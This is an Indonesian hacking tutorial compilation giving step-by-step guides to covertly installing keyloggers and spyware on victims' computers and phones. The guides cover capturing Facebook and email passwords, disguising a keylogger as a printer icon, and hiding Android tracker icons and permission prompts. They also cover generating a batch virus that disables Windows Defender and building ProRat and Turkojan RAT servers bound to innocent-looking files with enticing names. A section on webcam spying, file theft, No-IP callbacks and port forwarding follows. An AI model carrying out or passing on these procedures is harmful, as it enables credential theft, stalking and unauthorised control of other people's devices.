SOFTWARE-HACKER-JAGO-PART-9.htmll
KUMPULAN SOFTWARE
HACKER
ANDA JAGONYA
BAG 1 PART 9
Dikumpulkan oleh
KAMDANI.BA (Belum Apa apa)
196.
KEYLOGGER PRO UNTUK FIREFOX
Add Ons
Mozilla Firefox
Kalau
dilihat dari Menu Add Ons bernama My Music
a).
buka Browser Mozilla firefox
b). Buka
situs Ekstensi Keylogger
https://addons.mozilla.org/en-US/firefox/addon/keylogger-
220858/?src=cb-dl=users
c). Atau
buka situs Ekstensi Mozilla Firefox. Gunakan kata kunci :
Keylogger
d). Klick
Add To Firefox untuk install
e).
Restart computer
f). Tekan
Ctrl + L untuk Buat Password > OK
g). Login
ke Facebook, Tweeter, Email
h). Ctrl +
L, Masukkan Password anda > OK
i).
Password yg dicari sudah tampil
197.
NIFTY KEYLOGGER UNTUK FIREFOX
Seperty
diatas, tetapi hasilnya lebih jelas
a).
Buka Browser Mozilla Firefox
b). Buka
situs Ekstensi Nifty Keylogger
https://addons.mozilla.org/en-US/firefox/addon/kl/?src=search
c). Atau
buka situs Ekstensi Mozilla Firefox. Gunakan kata kunci :
Nifty
d). Add To Firefox untuk Install
e).
Restart computer
f). Login
ke Facebook, Tweeter, Emal
g). Tekan
Ctrl + Alt + K
h). Tampil
Username, Password, Waktu Akes dg jelas
198.
iSAVE ALL IN ONE KEYLOGGER
Sebuah
Keylogger yg sangat bagus, komplit dan kaya fitur.
Secara otomatis mengirim Email, Data, dll kepada
Si Pemasang keyloger di laptop Kurban.
·
Tidak terdeteksi sebagai virus
·
Otomatis mengirim laporan via
Email
·
Menampilkan Screenshot
·
Clipboard mampu merekam kegiatan
computer Windows
termasuk
merekam copy paste
·
Merekam aktivitas USB
·
Merekam CD Rom
·
Merekam Chatting
·
Mampu bersembunyi dari system Tray
a.
Install software
b.
Mengisi password > Klick Save
c). Muncul kombinasi tombol rahasia untuk membuka
program. Misal Ctrl + Alt + Shift + X (Tidak boleh lupa).
d). OK
e). Masuk ke aplikasi Keylogger ini. Tekan tombol
rahasia
f). Masukkan password > Enter
g). Klick satu kali Stop Now > Status menjadi
Stopped
h). Klick Menu Setting
i). Check list pada Enable Email Logs
j). muncul kotak dialog Log Email SMTP Setting. (Anda
sudah memiliki Email di gmail)
k). Check list pada gmail
l). Pada kotak SMTP Server Tulis :
smtp gmail.com >
masukkan
port 587
m). Masukkan Username dan password gmail anda
UJI COBA :
a). Klick
tombol Send Text Email > tunggu proses pengiriman
ke gmail
anda
b). Check gmail anda apa ada
pesan gmail masuk
Jika belum check dibagian SPAM > Jika belum masuk
ganti Port menjadi 465
c). Jika sudah masuk, aktipkan Keylogger ini dg klick
Stop Now dipojok kiri atas. Status menjadi Running
d). Tutup Keylogger dg klick tombol X > Klick Hide
199.
MENGUBAH FLASH DISK MENJADI KEYLOGGER
Software
: Shadow Keylogger
a).
Copy software kedalam Flash Disk
b). Tancapkan
Flash Disk pada computer kurban
c).
Jalankan program
d). Buat
Password > Password ini nanti untuk membuka hasil
e). Klick
Option
f). Ganti
icon. Misal pakai icon Printer Network
g). check
list pada Save Recorded Data to a single file on this computer
h). Klick
Browser > Tentukan lokasi penyimpanan hasil rekaman
Sebaiknya
lokasi penyimpanan langsung ke flash disk
i). OK
j). Klick
Record untuk merekam
k). Pada
Tray Bar tampil icon Printer, padahal itu Keylogger
UJI COBA :
·
Login ke tweeter > Klick ganda
icon Printer di Tray Bar
·
Masukkan password > OK
·
Hasil rekaman tampil di jendela
Keylogger dan di Flash Dish dalam bentuk file Microsoft Word
200.
KIDLOGGER UNTUK PC
Software
: Kidlogger.net > Tanam di computer kurban
http://kidlogger.net
a).
Buka software
b). Klick
Get Started
c). Isi
form registrasi lengkap
d). Isi
Email anda pada kotak Email
e). Klick
Daftar
f). Buka
Email anda
g). Ada
pesan masuk Email dari Kidlogger.net
h(.
Buka pesan itu
i). Klick
link Kidlogger.net untuk melakukan konfirmasi pendaftaran
j). Klick
link Download pada bagian Windows
k). File
Monitoring agent berhasil didownload
l) Install
file ini di computer/laptop kurban
m).
Jalankan program > Klick pilihan (Pengaturan)
n). Pada
Tab General yg direkam hanya aktivitas keyboard
Check list
pada Log USB masuk / keluar, pada Chating Skype, pada Log Alamat Web URL
0). Pada
bagian Tab KidLogger.net Pilih Tersambung dengan KidLogger.net ID perangkat
p). Pada
kotak Setting KidLogger.net Email Anda masukkan Email yg tadi sudah didaftarkan
q). Klick
Tes Koneksi (mengirim pesan) > OK
r). Anda
login ke KidLogger.net
s). Buka
halaman Dasboard. Bila sudah terkoneksi tampil nama
computer kurban pada monitoring agent yg
sudah terinstall
t).
Aktipkan Mode Perekaman. Caranya :Buka kembali
KidLogger dikomputer kurban. Klick tombol Mulai
Memantau sehingga tombol tsb berubah menjadi Berhenti Memantau > OK
u). Hapus
shortcut Kidlogger di desktop dan pada Start Menu computer kurban agar tidak
curiga.
UJI COBA :
·
Buka Facebook dan login
·
Pada Laptop lain login ke situs
KidLogger.net
·
Click to view log melihat hasil
perekaman
·
Click toolbar Jejak
·
Hasilnya tampak kalau baru saja
membuka Facebook beserta Email dan passwordnya
201.
HACKING ANDRIOD
202.
TEHNIK ROOT ANDROID
Software
: Kingo Root
www,kingoapp.com
Root
artinya menghack Android agar kita bisa mengubah, menghapus, menambah,
mengurangi, memodifikasi,
merusak segala yg ada pada system android. Sebelum Root file
belum bisa diakses.
Kita
berkuasa untuk mengakses, mengeksekusi semua file Command, system dalam
operating system Linux.
Dalam Windows fungsi Root Android memberi hak
administrator kepada pengguna.
Guna
Android di ROOT :
·
Akses tidak terbatas dalam system
Android
·
Instalasi aplikasi di memory card
dan install aplikasi yg butuh ROOT
·
Uninstall aplikasi bawaan vendor
·
Backup Add + System
·
Instalasi ROM Custom
·
Akses file Android secara penuh
·
OverClock processor untuk
meningkatkan performa
·
Pengguna Android dibawah 4.0 dapat
memakai BBM dg mengganti costum rom dg Root Android. Tidak
serta merta menaikkan performa. Baru membuka pintu pengembangan.
·
Android membatasi penggunaan akses
ke file system agar menjaga kestabilan kenerja handphone
KERUGIAN ROOT ANDROID
·
Menghilangkan garansi handphone.
Seperti membuka segel.
·
Proses Unroot (Kembali semula)
bisa mengembalikan hak garansi
·
Masalah keamanan
: Root atau Tidak Root, virus dan malware tetap saja berbahaya. Dan
dapat masuk.
KEUNTUNGAN ROOT PADA ANDROID
·
Dapat install aplikasi yg
membutuhkan Root
Misal :
App2Card dan Link2SD untuk memindahkan file ke SD
Titanium Backup untuk membackup aplikasi terinstall
dan data aplikasi seperti settingan
ScreenShot untuk mengambil screenshot dari layar HP
·
Dapat menginstall custom ROM Yaitu
system operasi Android bukan buatan vendor ponsel
·
Dapat melakukan pengaturan
memaksimalkan kinerja ponsel
Salah satu pengaturannya :
overclock processor untuk mempercepat kinerja ponsel. Tetapi dapat
memperpendek usia processor, baterai lebih boros,
cepat panas, dan tidak stabil.
·
Dapat Uninstall aplikasi bawaan
pabrik yg tidak berguna hanya memenuhi memory. Kalau kurang
hati hati dapat mengganggu kinerja HP.
a).
kunjungi situs www.kingoapp.com
b). Download dan install aplikasi :
android_root
c). Klick Next
d). Klick I Accept the Agreement
e). Klick Nex
f). Klick Next lagi
g). Check list pada kotak Create a desktop icon >
Next
h). Klick install Tunggu
i). Check list pada Launch Kingo Root > Finish
j). Pada aplikasi Kingo Root tampak pesan
: Not Connected
(belum tekoneksi dg laptop)
k). Sambungkan kabel koneksi Android ke USB Laptop
l). Pada layar HP pilih :
Tersambung sebagai perankat
m). Pilih Perangkat Media (MTP)
n). Kingo Rood di Laptop mendeteksi HP anda
0). Tunggu instalasi driver melakukan install
p). HP terdeteksi Klick Root. Jangan
membuka program lain pada laptop > Klick Finish. Android restart
otomatis
q). Muncul aplikasi bernama SuperSU
203.
KIDLOGGER ANDROID
Software
: http://kidlogger.net
(Laptop)
http://kidlogger_android.zip
(di HP)
Untuk
memantau aktivitas HP target. Panggilan masuk/keluar, SMS nasuk/keluar,
a.
Install software di Android
target.
b.
Android target terkoneksi dg
internet
c.
Klick Get Started untuk melakukan
pendaftaran
d.
Download software di Android
bernama : kidlogger_android.zip
e.
Ekstrak file menggunakan winrar,
winzip, 7zip atau lainnya
f.
Muncul beberapa file. Copy file
kidlogger.apk ke HP target
g.
Install file di HP
h.
Check list pada Saya Mengerti
tetapi saya tetap ingin memasangnya > Klick Tetap Pasang Tunggu Instalasi
i.
Tampil pesan : Apl Terpasang
j.
Klick Buka > Setting
k.
Check list semuanya
l.
Klick Terhubung ke kidlogger.net
m.
Check list pada Upload Log File
n.
Klick Akun Kidlogger.net
o.
Masukkan Email yg sudah terdaftar
di Kidlogger.net
p.
Klick OK Tunggu proses koneksi
selesai
q.
OK
r.
Kembali ke halaman awal Kidlooger
ini
s.
Klick Start Monitoring Tunggu Menu
berubah jadi
Stop Monitorng
Keluar dari aplikasi Kidlogger.
Kembalikan HP kawan anda
t). Buka
situs Kidlogger di Laptop. Login dg Akun Anda.
u). Pada
Menu Dashboard Klick bagian Android
Klick to
View Log. Anda dapat memantau HP target
204.
CHILDREN TRACKER Untuk memantau HP Anak
Software
: Children Tracker. http://www.safet.me
a(.
Masuk situs Software
b). Klick
Download Now For Android Aplikasi Children Tracker
c). Ingin
Download memakai Google Play atau Other Store
d) Pilih
Other Store karena file ekstensinya .apk
e). Klick
Apk Download
f). Copy
file Children Tracker_latest.apk ke Android target
g).
Install file
h). Klick
Berikutnya > Klick Pasang Tunggu Instalasi
i). Klick
Buka > Klick Accept & Continue
j). Masuk
Registrasi > Klick Register
k). Anda
sudah mengaktipkan Email Anda > Masukkan Email pada kotaknya > Klick
Register
l). Klick
Next
j).
Aktipkan semuanya > Klick Next
k). Check
list pada Enable Device Admin dan Hide Application Icon
l). Next
m) Tampil
kode membuka Aplikasi. Misal :***123456### (jangan
lupa)
n). Klick
OK
o). Tampil
pesan : Status Running
p). Keluar
dari aplikasi. Kembali ke Menu utama Android.
Kembalikan HP target ke pemiliknya.
q).
Aktipkan Laptop. Buka Email
r). Tampil
link aktivasi dan id login dan passwordnya
s). Copy
Email dan simpan pada Notepad
t). Klick
aktivasi > Your Account is Activated
u). Klick
link Click here to return login page
v).
Masukkan id login pad password yg telah diberikan di Email
w). Klick
Log in > Bisa muncul pesan Error. Biarkan saja.
x). Buka
Email Anda yg dari Children Tracker
y). Klick
link pada Login Address
z). Masuk
ke halaman Dashboard dapat memantau panggilan dan SMS masuk/keluar anak, juga
ada peta lokasi anak
aa).
Klick Location
ab).
Pada menu TimeLine, aktipkan Menu Filter Call
Tampil
Daftar Panggilan dan SMS masuk/keluar dari HP
ac).
Bila lupa kode masuk aplikasi Children Tracker, silahkan masuk Menu Setting
> lihat pada bagian Password open app
205.
ANDROID LOST Untuk memata matai aktivitas HP hilang
Software
: Androidlost.com
·
Untuk melihat panggilan dan SMS
keluar/masuk
·
Melihat posisi target
·
Menggetarkan dan membunyikan alarm
HP
·
Mengirim pesan ke HP
·
Mengaktipkan kamera depan atau
belakang untuk melihat wajah pemakai HP
·
Memformat memory SD Card
a). Install
software Android Lost pada HP
b). HP terkoneksi Internet
c). Ganti Email utamanya dg Email anda sendiri untuk
login ke Google Play
d). Pada HP buka Google Play
e). Tulis : Lost Android pada
Kotak > Search
f). Klick satu kali pada aplikasi Lost android
g). Klick Pasang > Mulai instalasi
h). Klick Terima
i). Klick Buka
j). Klick Reques Administrator Rights
k). Aktipkan Personel Notes
l). klick Aktipkan
m). Pada HP tampil shorcut Personal Notes > Hapus
shortcut
n). Pada laptop buka situs https://www.androidlost.com
0). Klick Sign In > untuk login ke halaman
Dashboard
p).
Masukkan Email yg sudah diaktipkan di HP > Login
q). klick
Menu Control
r). Tampil
sub menu Basic, Status, Message, Security, Mobile, Backup, Premium
s). Untuk
melihat lokasi HP Klick pada Menu Control >
Basic >
Send location
t). Pada
HP tampil Peringatan. (Dia curiga?). Kalau Dia klick
ALLOW maka lokasi HP dikirimkan ke Laptop
Anda. Jika Dia Klick Deny, lokasi HP tidak dikiram. (Setiap
Anda mengirim Peringatan, HP menulis Allow
atau Deny). Hal ini tidak menyenangkan.
u). Untuk
menghindari hal itu, pada HP buka Menu Setting/Pengaturan.
Klick Keamanan
v). Non
Aktipkan App Permission. Tampil Peringatan > OK
w). Tutup
Pengaturan
Kadang
kadang pada perintah Location tidak langsung menampilkan lokasi.
Tetapi tampak gambar panah.
Penyebabnya macam macam seperti koneksi Internet kurang baik.
Yg bisa dilakukan hanya menunggu. Anda
bisa
Log Out dulu. Reset modem dan jalankan AndroidLost.com > Log In lagi.
UJI COBA :
a).
Pada Laptop jalankan program
b). Masuk
ke Menu Control > Basic > Send Location
c). Pada
HP tidak tampil Peringatan. Lokasi HP dilaporkan
d). Pada
kotak Message Popup, kirim SMS ke HP > Klick Send
e). Pada
bagian Control > Message > SMS Inbox and Sent >
Tampak
daftar SMS keluar/masuk di HP
f). Pada
bagian Control > Security > Lock Phone Dapat mengunci HP, dapat menghapus
CD Card HP
g). Pada
bagian Control > Mobile > Text To Speech Dapat menulis pesan pada kotak.
Pilih Bahasa. Klick Speak
> Pesan menjadi suara.
h). Pada
bagian Control > Mobile > Browser History tampak situs apa
saja yg dibuka di HP. Pada Bagian
Call List tampak panggilan masuk/keluar. Pada bagian Get List tampak berapa
banyak Panggilan
i). Pada
bagian Control > Mobile > Front Camera Anda dapat memotret wajahnya dari
Laptop. Bila dg
Rear Camera mengambil foto memakai kamera belakang
206.
SCRIPT KIDDIES
Orang yg
mengaku aku menjadi Master Hacking tetapi bisanya hanya menggunakan script
milik orang lain disebut Script Kiddies.
Disebut
juga Script Bunny, Script Kitty dan Script Running Juvebile(SRJ)
Seorang
Script Kiddies menyerang siapa saja secara acak tanpa target yg terencana.
Mereka mengandalkan
hasil scan dari tools yg digunakan. Sript Kiddies merupakan
ancaman.
Seorang
hacker professional pasti menanjak dg melewati tahap Script Kiddies.
Untuk
memahami dunia hacking perlu menguasai berbagai bahasa pemrograman.
Terutama HTML, JavaScript,
PHP & SQL, Visual Basic, C, Phyton, Perl dll.
Anda bisa
membuat sendiri Script.
Contoh
menggunakan script milik orang lain :
Dg Google,
kita menggunakan Javascript untuk mencari file MP3
Masukkan
script berikut kedalam address bar browser :
Javascript:Qr=’’;if(!Qr)
{void(Qr=prompt (‘Masukkan Nama Artis atau judul Lagunya:’,’’))};if(Qr)
location.
href=’http://www.google.com/search?query=%22parent+directory%22+%22’+escape(Qr)+’%22+mp3
+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=actives&sa=N’
>>
Enter
Muncul
permintaan judul lagu yg dicari. >>
OK > Lagunya muncul.
Script
diatas dimodifikasi untuk mencari program :
Javascript:Qr=’’;if(!Qr)
{void(Qr=prompt (‘Masukkan Nama Aplikasinya:’,’’))};if(Qr) location.
href=’http://www.google.com/search?query=%22parent+directory%22+%22’+escape(Qr)+’%22+exe
+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=actives&sa=N’
>>
Enter
Script diatas
dimodifikasi untuk mencari Gambar :
Javascript:Qr=’’;if(!Qr)
{void(Qr=prompt (‘Masukkan Nama Gambar:’,’’))};if(Qr) location.
href=’http://www.google.com/search?query=%22parent+directory%22+%22’+escape(Qr)+’%22+jpg+OR+png
+OR+bmp+-html+-htm&num
=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=actives&sa=N’
>>
Enter
Script
diatas dimodifikasi untuk mencari Ebook :
Javascript:Qr=’’;if(!Qr)
{void(Qr=prompt (‘Masukkan Nama Pengarang atau judul:’,’’))};if(Qr) location.
href=’http://www.google.com/search?query=%22parent+directory%22+%22’+escape(Qr)+’%22+pdf
+OR+rar+OR+zip+-html+-htm&num
=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=actives&sa=N’
>>
Enter
Script
diatas dimodifikasi untuk mencari Games :
Javascript:Qr=’’;if(!Qr)
{void(Qr=prompt (‘Masukkan Nama Game:’,’’))};if(Qr) location.href=
’http://www.google.com/search?query=%22parent+directory%22+%22’+escape(Qr)+’%22+exe+OR+iso+OR+rar+-html
+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=actives&sa=N’
>>
Enter
Script
diatas dimodifikasi untuk mencari VBScript :
Kita
diaktipkan untuk bisa membuka CD RON secara otomatis.
Caranya : Salin Script dibawah ini kedalam
Notepad dan menyimpannya dg nama cdrom.vbs.
Script
tsb. bekerja pada komputer local.
Do
Set oWMP =
CreateObject (“WMPlayer.OCX.7”)
Set
colDROMs = oWMP.cdromCollection
If
colCDROMs.Count >= 1 then
For I = 0
to colCDROMs.Count = 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
End if
Loop
>>
Enter
207.
EXPLOIT
Dg Google,
dapat ditemukan Exploit. Untuk mendapatkan exploit system Solaris, ketikkan pada Google :
Solaris Exploit > Enter
Tampil
beberapa exploit
Program
ditulis dg bahasa Perl, atau PHP, atau C.
Kalau
listing program terdapat tulisan :
#!/usr/bin/perl
Berarti memakai bahasa Perl
#!/usr/bin/php
Berarti memakai bahasa PHPstate
Program
tsb belum dapat Anda jalankan. Masih perlu di compile
COMPILE
EXPLOIT DG ACTIVEPERL
Software
: ActivePerl
http://perl.org atau http://www.activestate.com
Install
software.
Salin script
Exploit kedalam Notepad simpan dg namanya : nama.pl
Jalankan
CommandPromp. Masuk kedirectory penyimpanan nama.pl
Ketikkan
: perl nama.pl > File tsb sudah berjalan.
Untuk
Exploit PHP, meminta Anda meng upload file PHP tsb. pada
sebuah hosting yg disebut juga dg nama
PHP Injection.
208.
WEB CRAWLING (spidering)
Software
: HTTrack
Software
: http://www.nama-target.com/wp-content/uploads/
Software
: IntelliTamper
http://www.nama-website.com/robots.txt
Aksi
merampok dg cara meng copy isi suatu Website kedalam
computer kita. Sehingga kita bisa membongkar
website secara off line atau tidak harus selalu connect internet.
Website yg
terbuat dari Flash tidak bisa dicopy secara sempurna sebab tidak tersimpan
dalam file HTML
atau Script PHP.
Jalankan
program HTTrack > Next > masukkan nama file >
Next
Anda juga
bisa mengganti Base path atau lokasi penyimpanan file download.
Masukkan nama file yg akan di download pada Bag. Web Address (URL)
> Next > biarkan pada default nya > Finish
Proses
download berjalan.
Klick
tombol Browse Mirrored Website > Website terbuka (offline)
Anda
bisa melihat directory tanpa harus menjadi administrator dulu.
Data,
Gambar, Dokumen, dll dalam directory dapat dibuka.
Directory
juga bisa di;ihat pada :
http://www.nama-target.com/wp-content/uploads/
Software
: IntelliTamper
Masukkan nama website target > Enter > Start Scan
Tampak nama nama directory, termasuk data rahasia.
Melihat
Directory memakai robots.txt :
http://www.nama-website.com/robots.txt
209.
MEMBUAT VIRUS
Software
: In Shadow Batch Virus Generator206. WEB CRAWLING (spidering).
a).
Install dan jalankan program
b). Klick
Menu Createions Option
Tulis nama pembuat virus, Klick Font > Font Color
Pilih
huruf dan ukuran huruf
a. Klick
OK
b. Pilih
Meni INFECTIONS isi pilihan infecksi
c. Klick
Menu SECURITY
d. Dapat
juga mematikan proteksi Windows Defender, Windows Update, Windows Exploer,
Security Center,
Keyboard, Mouse, Menyembunyikan folder My Documents, dll
e. Untuk
menghidupkan kembali Klick satu kali tombol perintah yg diinginkan.
f. Perintah
perintah :
Jpeg to .Vir - mengganti gambar.Jpeg menjadi
gambar.vir Disable Keyboard - mematikan keyboard
Hide My Docs - menyembunyikan folder Documents
Disable TskMngr - mematikan fungsi Task Manager
Kill Explorer - mematikan Windows Explorer dll
Klick Other Options -menghapus folder My Picture,
Notepad, memblokir Youtube, memblokir
Google dan Yahoo
Del My Music, Block Youtube, Del Notepad
Virus diberi nama file yg
merangsang agar orang ingin membukanya. File wajib disimpan di
Klick Menu Creation Option dan Klick Save As Bat
Virus disebar ke kumputer lain atau di ubload
210.
TROJAN
Kata
Trojan berasal dari ceritera tentara elit Yunani yg disusupkan masuk
perbentengan musuh dikota Troya
dg berada didalam perut patung kuda kayu yg besar.
Patung itu dibawa masuk ke perbentengan. Pada malam
hari tentara elit Yunani itu keluar dari perut patung kuda. Lalu membuka pintu gerbang sehingga tentara
Yunani yg berada diluar benteng bisa masuk ke perbentengan.
Trojan
adalah sebuah program spy yg disusupkan kekomputer target dg berbagai cara. Antara lain disisipkan pada
program lain seperti Email, Game, download dsb lalu dikirim kekomputer target.
Trojan Horse terdiri dari dua bagian. Bag.
Client dijalankan komputer asal. Bag.
Server disusupkan ke komptuer target.
Contoh
Software Trojan :
Back
Orifice Sebagai kdndali jarak jauh (Remote Administration)
Back
Orifice 2000, 54320, 54321
NetBus
1.60, 1.70, 12345
NetBusPro
2.01, 20034
SubSeven
27374
http://www.simovits.com/sve/nyhetsarkiv/1999/nyheter9902.html
http://www.simovits.com/trojans/trojans_name.html
http://www.proRat.net untuk jaringan local
Cari IP
dan port komputer target yg terbuka
Jalankan
ProRat Trojan > Masukkan IP dan Port. Default
Port 5110
Klick
Create > Pilih Create ProRat Server
Pada
kotak dialog Create Server > Lihat tab. Notification.
Notification
itu untuk memberitahu apakah target sedang On atau Off
Chentang
pada Bag. Use Proconnective Notification
Isi
IP (DNS) Address dg IP komputer Anda. (Target
dijaringan Local)
Anda dapat
mengatur Notifikasi lainnya :
Mail
Notification. Bila target ON Anda diberitahu lewat Email.
ICQ
Pager Notification. Pemberitahuan
lewat ICQ. Tetapi Anda harus membuat ICQ di http://www.icq.com
CGI
Notification. Pemberitahuan lewat
website. Anda harus membuat script CGI lebih dulu.
Pada tab.
General Setting, isikan Server Port (default 5110) dan
Victim
Name.
Pada Bag.
Bind with File Kita dapat menyusupkan file yg akan
dijalankan server pada komputer target.
Beri
tanda chentang pada Bind server with a file.
Cari file apa saja yg akan digabungi (Misal Email) file Trojan. >
Open
Bila sudah
dapat > OK
Pada
server extention, kita bisa memilih extention apa.
Misal .EXE
Server
icon untuk mengganti icon supaya tidak dicurigai.
Program
ProRat menyediakan pilihan icon. >
Klick icon pilihan.
Klick
Create Server dikiri bawah.
Muncul pesan : Anda yakin akan menggunakan IP Address tsb > Yes
>>
OK File binded server selesai dibuat
Sekarang
saatnya memasukkan file server ke
komputer target.
Terserah cara yg akan Anda tempuh. Via LAN, WAN,
pinjam laptop. PC, FTP, Social Enginering, Email, Game,
Download dsb.
Pada
tampilan utama ProRat, > Klick tombol Proconnective >
Untuk
melihat Daftar komputer dan IP target yg sedang ON
Proconnective
adalah bawaan ProRat. Berfungsi
sebagai bridge koneksi server dg client.
Klick
Connect > Muncul permintaan password
Bila
berhasil connect, Status ProRat berubah jadi
Connected. ,
Kini
Anda sudah dapat mengendalikan komputer target.
Mengetahui informasi dari PC, mengirim pesan, error,
mematikan komputer, meengunci mouse, membuka CD-ROM, memotret wajah kurban dg
webcam.
Klick
Info > System Informasi > Tampak informasi komputer.
Untuk
mengirim pesan error palsu, > pilih Message. > Atur
konfigurasi pesan tsb. dg memilih salah satu icon
yg ingin Anda perlihatkan pada target.
Untuk melihat
effect nya, pada Message Box Buttons, saya memilih
Abort,
Retry, Ignore. Kemudian masukkan pesan yg ingin Anda
sampaikan.
Pada waktu
target mengklick salah satu tombol dari pesan yg Anda kirim, pada layar Anda
muncul
tombola pa yg dia klick.
Bahkan
kita dapat meng intai dg menggunakan Keylogger.
Klick
pada Bag. Keylogger. > Klick Read Log.
Untuk
menggunakan webcam, Klick Screen Shot > pilih metodenya.
Banyak
hal bisa Anda lakukan.
Jangan
melakukan tindakan merusak seperti memformat, Mengacau registry, dsb.
Untuk
mematikan komputer, Klick Shut Down PC dan Klick Turn Off.
211.
RAT (tikus)
Remote
Access Trojan disebut juga Remote Administration Tool
Menghabiskan,
mengacak acak, menghancurkan. Ini kelakuan Tikus,
Dg
Aplikasi RAT kita bisa mengendalikan secara penuh computer target.
Bahkan mengacak acak atau
menghancurkannya.
212.
Cek IP
Untuk
membuat RAT perlu tahu IP Laptop/computer dan IP modem
Anda. Caranya :
a).
Pada jaringan internet Speedy dg modem TP Link (Telkom)
b). buka
kotak dialog Run Tekan tombol Windows + R
c). Ketik : CMD > OK atau Enter
d). Tampil
jendela Command Promp
e). ketik : ipconfig > Enter
f). Pada
bagian IPv4 tampak IP Address Laptop Anda 192.168.1.100
g). Pada bagian
Default Gateway IP Address modem 192.168.1.1
213.
No-Ip.Com
www.noip.com dan www.DUC
(Dynamic Update Client dari No-IP
(Download
Client)
Untuk
membuat RAT perlu IP computer target. Software
ini untuk membuat IP Address (Host) statis, tetap,
tidak berubah seperti dinamis
IP Address
(Host) akan dipasang pada aplikasi RAT Server
a).
Buka www.noip.com
b). klick
Sign Up untuk pendaftaran
c). Buat user
Name dan Password yg Anda inginkan
d).
Masukkan Email Anda yg aktp dan ulangi
e).
Biasanya kotak Hostname terisi otomatis. Tapi Anda dapat
menggantinya dan mengeditnya sendiri.
f). klick
Free Sign Up
g). Tampil
konfirmasi Akun
h). Buka
Email yg telah didaftarkan
i). tampil
Email Activate Your Account dari No-Ip.com
j). Buka
Email > Klick tombol Activate Account
k). Tampil
pesan Your Account is Now Activated
l). Klick
Manage My Host Now
m). Anda
dibuatkan host secara otomatis. Tetapi boleh dihapus
Menghapus
dg Klick Remove
n).
Membuat Host Baru > Klick Add A Host
0). Pada
kotak Host Name buat nama Host misal Apasaja
p). Di
kotak kanan pilih domain yg Anda inginkan Misal no-ip.org
q). Klick
Add Host. Host telah dibuat. Anda
dapat membuat lagi.
r). Download
aplikasi DUC (Dynamic Update Client} dari No-IP
s). Klick
Menu Download Client > Klick Download Now
t). Muncul
kotak dialog. Tutup saja
u).
Aplikasi DUC sudah selesai download > Jalankan untuk Install
v). Muncul
wizard License Agreement > Klick I Agree > Install
w). Klick
Finish
x).
Jalankan aplikasi DUC dari No-IP
y).
Masukkan Username dan Password yg sudah Anda buat tadi
z). Klick
Sign In
aa).
Pada bagian Client ID sudah tercheck list warna hijau
Pada
Updating dan IP masih silang merah berarti belum aktip
Untuk
mengaktipkan Klick Edit Hosts
ab).
Check list pada host Anda . Klick Save > Semua
sudah hijau
ac).
Klick X untuk menutup aplikasi DUC. Tampil icon di
tray bar
ad).
Untuk mem buka Klick ganda pada icon DUC atau Start Menu
214.
TURKOJAN ( berjenis RAT)
·
Meremote Desktop target
·
Mengaktipkan Webcam target secara
diam diam
·
Membalik tombol mouse
·
Membuat mouse target menjadi gila
·
Mencuri semua data yg ada di Hard
Disk target
·
Membunuh fungsi keyboard dan mouse
·
Shutdown, Restart dan Log Off
Laptop target tidak beraturan
a).
Install software Turkojan > Next > Next > Next > Next
b). Wizard
persetujuan
c). Check
list pada Bu Metni Tekrar > Klick Kabul Ediyorum I agree
d). Ganti
bahasa Turkojan dari bahasa Turki ke bahasa Anda
a. MEMBUAT
APLIKASI RAT SERVER
b. RAT
Server ini disebarkan ke computer target
c. Anda
memerlukan Port Modem Anda dan Host (IP Address)
Yg dari situs No-IP.Com.
Siapkan terlebih dulu
d. Bentuk
dan Nama RAT Server harus menarik agar calon target tergiur dan dg icon
menggiurkan juga atau samarkan
sebagai aplikasi yg banyak dicari dan didownload
e. Klick
Editor
·
Pada kotak Address masukkan IP
(Host) dari No-IP.Com
Dapat
dilihat di DUC > Klick Edit Hosts
·
Connection Port: Masukkan Port
dari bagian Forwarding Modem
·
Username: Buat sesuai keinginan
·
Running Mode: Pilih dan aktipkan
Stealth Mode (Invisible)
·
Check list pada Copy Server to PC
dan Autustart Server
·
Show Message: Berikan Check list
> Tulis Judul dan isi pesan Anda
·
Icon: Biarkan
default atau cari icon yg lucu dan unik pada www.findicons.com
> Pilih icon > Download ICO
·
Klick Seleck
icon > Klick Save
·
Tentukan lokasi
penyimpanan file server
·
Beri nama yg
menggiurkan > Klick Save > Tunggu > OK
·
Perlu pengaturan
laporan jika ada target yg sedang online
·
Klick Menu
Settings > Check list Notify me when user is online > Klick Save Settings
UJI COBA:
a).
Buka aplikasi Turkojan
b).
Masukkan Port yg sama dg Port Server > Klick Start
c). Bila
ada target online muncul laporan di pojok kanan bawah
d). Pada
aplikasi Turkojan bagian Connection ID muncul identitas lengkap target dg IP
Address dan Nama komputernya
e). Klick
ganda ID target untuk koneksi server Turkojan dg aplikasi Turkojan Client
f). Tampil
pesan Connected dikiri bawah
Menu
Accessories:
·
Remote Desktop: Klick ganda Remote
Desktop. Anda dapat mengendalikan dan menjalankan computer target > Klick
Play
·
Webcam Streaming. Anda dapat
mengaktipkan Webcam target dg diam diam dan dapat melihat wajah target
·
Audio streaming. Untuk
mengaktipkan Audio laptop target dan merekamnya
·
Control mouse: > Klick Start
> Klick Stop
·
Crazy mouse: > Klick Start >
Klick Stop
·
Mouse Button: Pengganti fungsi
Klick
·
Mouse Lock: Mengunci dan me non
aktipkan mouse target
·
Bagian Manage Keyboard >
Keyboard Settings mengacaukan fungsi keyboard
·
Menu Communication: Chat with
Server. Anda dapat mengirim pesan pesan kepada computer target dg diam diam
Klick Start Chatting With
Server untuk memulai percakapan
·
Menu Manage Files > Files
Manager
Anda dapat melihat, membuka, mengambil data dan
memindahkan ke laptop Anda
Klick Drive. Untuk melihat semua drive computer target
·
Menu Fun Manager: Untuk
menyembunyikan icon yg ada di computer target. Menghilangkan taskbar, Mematikan
tombol Start, Membalik layar, Membuka dan Menutup DVD Room, Merestart dan
mematikan computer target
215.
PORT FORWARDING
·
Setting Port agar bisa terkoneksi
dg laptop target dan bisa diakses dari manapun. Untuk setting Port Forwarding
pada modem TP Link bawaan Telkom Speedy boleh membuat Port lebih dari satu
port. Pada jenis dan merk modem
caranya sama saja.
·
a). Buka Browser, Ketik IP Address
modem yg sudah kita catat diatas yaitu 192.168.1.1 > Enter
·
b). Masukkan User Name dan
